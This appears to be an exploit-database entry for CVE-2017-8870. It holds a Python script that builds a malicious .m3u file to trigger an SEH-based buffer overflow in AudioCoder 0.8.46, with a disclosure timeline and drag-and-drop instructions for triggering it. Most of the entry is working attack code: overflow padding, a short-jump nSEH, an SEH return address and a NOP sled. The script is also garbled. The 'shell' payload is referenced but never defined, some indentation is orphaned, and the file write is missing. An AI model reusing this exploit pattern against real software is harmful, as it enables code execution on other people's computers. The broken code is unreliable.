AudioCoder 0.8.46 Local Buffer Overflow

Related Vulnerabilities: CVE-2017-8870  
Publish Date: 27 Jul 2017
Author: Muhann4d
# Exploit Title      : AudioCoder 0.8.46 Local Buffer Overflow (SEH)
# CVE                : CVE-2017-8870
# Exploit Author     : Muhann4d @0xSecured
# Vendor Homepage    :
# Vulnerable Software:
# Vulnerable Version : 0.8.46
# Fixed version      : N/A
# Category           : Local Buffer Overflow
# Tested on OS       : Windows 7 Pro SP1 32bit
# How to             : Open AudioCoder then drag & drop the .m3u file in it and then press the START button.
# Timeline  : 
# 2017-05-05: Vulnerability discovered, vendor has been contaced
# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" 
# 2017-05-09: A POC sent to the vendor. No reply since then.
# 2017-06-26: Exploit released.
print "AudioCoder 0.8.46 Local Buffer Overflow By Muhann4d @0xSecured"
from struct import pack
junk = "http://" + "\x41" * 741
nseh = pack('<I',0x909006eb)
seh = pack('<I',0x66015926)
nops= "\x90" * 20
junkD = "D" * (2572 - (len(junk + nseh + seh + nops + shell)))
exploit = junk + nseh + seh + nops + shell + junkD
    file= open("Exploit.m3u",'w')
    raw_input("\nExploit has been created!\n")
    print "There has been an Error"
